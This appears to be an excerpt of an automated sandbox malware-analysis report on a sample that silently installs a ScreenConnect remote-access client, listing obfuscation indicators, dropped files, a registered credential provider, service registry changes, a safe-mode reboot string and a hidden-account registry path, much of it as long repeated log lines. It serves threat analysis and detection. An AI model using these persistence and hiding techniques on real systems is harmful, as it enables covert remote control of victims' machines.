                              Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              barindex
                              Source: 0.2.file.exe.30a0000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: 0.0.file.exe.f578f8.1.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: file.exeStatic PE information: real checksum: 0x54fd91 should be: 0x56d5ba
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_059E5522 push eax; retf 0_2_059E5529
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05A02F5A push eax; mov dword ptr [esp], edx0_2_05A02F6C
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05A01A91 push eax; mov dword ptr [esp], ecx0_2_05A01AA1
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_051B5530 push eax; mov dword ptr [esp], ecx8_2_051B5541
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_051B9CF0 push eax; mov dword ptr [esp], ecx8_2_051B9CF1
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_051BB120 push eax; mov dword ptr [esp], ecx8_2_051BB121
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05BF64F0 pushfd ; ret 8_2_05BF651D
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05BF3EC0 push esp; ret 8_2_05BF3ED3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05BF3E60 pushad ; ret 8_2_05BF3E73
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD33E37928 push ebx; retf 9_2_00007FFD33E3796A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E1FF8A push esi; iretd 10_2_00007FFD33E1FFC2
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E21E7F push esi; iretd 10_2_00007FFD33E21E80
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD34122EC3 pushfd ; iretd 10_2_00007FFD34122F86
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD34126097 push cs; iretd 10_2_00007FFD341260A5
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD34132E40 push ebp; retf 10_2_00007FFD34132EBE
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD34132EBF push ebp; retf 10_2_00007FFD34132ECE
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD341227B8 push edx; iretd 10_2_00007FFD341227BB

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-1b99-d78ca2f0bc1a}\inprocserver32
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC9F.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE7EB.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC9F.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE7EB.tmpJump to dropped file
                              Source: ScreenConnect.ClientService.dll.3.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e6cb77284cf765aa)Jump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: file.exe, 00000000.00000000.2130060799.0000000000A26000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: file.exe, 00000000.00000002.2161488488.0000000005800000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: rundll32.exe, 00000005.00000003.2158572880.0000000004CD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3392174323.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2252418141.000000001BFF2000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2250157916.000000001BD62000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2250038149.000000001BD20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: file.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.5.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.ClientService.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
